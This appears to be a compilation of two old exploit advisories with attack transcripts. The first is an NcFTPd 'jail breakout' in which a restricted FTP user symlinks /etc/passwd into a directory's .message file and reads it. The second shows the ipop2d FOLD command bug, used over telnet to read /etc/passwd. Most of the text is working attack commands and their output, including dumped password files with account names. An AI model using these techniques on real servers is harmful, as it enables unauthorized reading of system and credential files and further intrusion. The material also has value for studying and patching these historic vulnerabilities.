230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250- 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ 250-# 250-root:*:0:0:Charlie &:/root:/bin/sh 250-toor:*:0:0:Bourne-again Superuser:/root: 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin 250-operator:*:2:5:System &:/:/usr/sbin/nologin 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin 250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin 250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin 250-test:*:1003:1003:test:/home/test:/bin/sh 250-+testx:*:::::/bin/sh 250 ftp> +on freebsd you can symlink directories like ´/´ Cheerio, 
Kingcope
NcFTPd versions 2.8.5 and below suffer from a remote jail breakout vulnerability.
Dotslash/pop2d.fold.txt ( na)
While working to port the ipop2d exploit to Java, I discovered another hole in
the FOLD command of ipop2d: the ability to read any file that is
readable by the pop2d user id. Attached is a ported exploit in Java for
bnc, as well as the pop2d exploit transcript.
-d0tslash
#b10z EFnet
#9x EFnet
[mandark@mandark mandark]$ telnet localhost 109
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
+ POP2 localhost.localdomain v4.46 server ready
helo mandark PASSHERE
#1 messages in /var/spool/mail/mandark
read 1
=389 characters in message 1
retr
Return-Path: <root@mandark.jumpline.com>
Received: (from root@localhost)
by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
Date: Fri, 14 Jul 2000 12:28:07 -0400
From: root <root@mandark.jumpline.com>
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
To: mandark@mandark.jumpline.com
Status: RO
fuckme
acks
=0 No more messages
fold /etc/passwd
#1 messages in /etc/passwd
read 1
=1178 characters in message 1
retr
Date: Thu, 13 Jul 2000 16:50:07 -0400
From: root@mandark.jumpline.com
Subject: /etc/passwd
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
postfix:x:101:104:postfix:/var/spool/postfix:
gdm:x:0:0::/home/gdm:/bin/bash
mandark:x:500:503::/home/mandark:/bin/bash
godie:x:0:0::/home/godie:/bin/bash
mp3:x:501:506::/mp3:/bin/bash
chefo:x:502:507::/home/chefo:/bin/bash
crunch:x:503:508::/home/crunch:/bin/bash
gsx:x:505:510::/home/gsx:/bin/csh
matt:x:506:511::/home/matt:/bin/bash
lyw0d:x:507:512::/home/lyw0d:/bin/bash
Pop2d: any file on the system can be read remotely from a POP2 server by a user with a valid POP account, due to a bug in the FOLD command.